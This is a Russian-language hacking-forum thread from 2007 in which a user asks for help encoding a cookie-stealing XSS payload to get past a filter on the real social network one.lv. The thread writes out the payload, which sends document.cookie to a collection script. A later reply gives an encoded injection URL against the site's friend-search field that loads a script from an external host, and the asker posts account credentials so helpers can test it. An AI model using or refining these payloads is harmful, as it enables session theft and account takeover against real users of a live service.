HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

xss шифровка
  #1  
Старый 09.12.2007, 14:56
offiks
Новичок
Регистрация: 16.01.2007
Сообщений: 16
С нами: 10166802

Репутация: 6
По умолчанию xss шифровка

помогите вставить скрипт
--><script>document.write(String.fromCharCode(<scrip t>document.write("<img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">") ;</script>));</script><!--
и обойти фильтр
Я ломал голову, да нету у меня особых навыков навыков, но хотелось бы сделать, помогите пожалуйста перекодировать чтоб сайт принял мою наживу
 

  #2  
Старый 09.12.2007, 15:04
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
С нами: 10489346

Репутация: 1403


По умолчанию

Цитата:
и обойти фильтр
А фильтр на что ругаеться?
 

  #3  
Старый 09.12.2007, 15:07
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

в программе inetcrack http://old.antichat.ru/inetcrack/можно перевести
 

  #4  
Старый 09.12.2007, 15:09
Dumkopff
Познающий
Регистрация: 05.04.2006
Сообщений: 76
С нами: 10578485

Репутация: 73
По умолчанию

http://old.antichat.ru/crackchat/HTML/
кури.
 

  #5  
Старый 09.12.2007, 15:11
offiks
Новичок
Регистрация: 16.01.2007
Сообщений: 16
С нами: 10166802

Репутация: 6
По умолчанию

я честно не могу разобратся в чём дело но ко мне доходит только: &quot; escape(document.cookie) &quot;

по моему он не обробатывает плюсы, но когда я заменил плюсы на %2B он всё равно это же и присылает.

P.S. большое спасибо за отзывчевость
 

  #6  
Старый 09.12.2007, 15:22
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

Цитата:
Сообщение от Dumkopff  
http://old.antichat.ru/crackchat/HTML/
кури.
если ты не в курсе инет кряк как раз и делает это, есть такая строка как стринг =\ хех
 

  #7  
Старый 09.12.2007, 15:33
offiks
Новичок
Регистрация: 16.01.2007
Сообщений: 16
С нами: 10166802

Репутация: 6
По умолчанию

я всё равно могу и декодировать и тут http://ha.ckers.org/xss.html#XSScalc , там всё же есть? не так ли? =[

эту уязвимость я пытаюсь осуществить на сайте one.lv (в поле слева - найти друга (http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=тут)

помогите подходяще закодировать пробовал кодировать весь урл, всё равно не работает...

Пожалуйста для меня это вопрос сложный, уже 2 день парюсь
 

  #8  
Старый 09.12.2007, 15:42
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
С нами: 10489346

Репутация: 1403


По умолчанию

пля. там нужна регистрация... При реге надо воодить телефон =\ Я так понял туда пасс отправляеться =\
 

  #9  
Старый 09.12.2007, 15:45
offiks
Новичок
Регистрация: 16.01.2007
Сообщений: 16
С нами: 10166802

Репутация: 6
По умолчанию

ой забыл, я хотел написать и подготовленый акаунт, извеняюсь
Login: offx
password: antichat

кстате, когда я ему впариваю %22%2B%22 он их декодирует не в: "+" (как должно быть) а в: &quot; &quot;

Последний раз редактировалось offiks; 09.12.2007 в 15:47..
 

  #10  
Старый 09.12.2007, 15:58
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
С нами: 10489346

Репутация: 1403


По умолчанию

http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=%22%3E;%3Cscript%20src=http://lamer-power.jino-net.ru/hek%3E%20%3C/script%3E
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Активная XSS на mail.ru Dronga Уязвимости Mail-сервис 69 05.04.2008 01:56
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Уязвимости CMS / форумов 6 26.10.2006 21:30
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...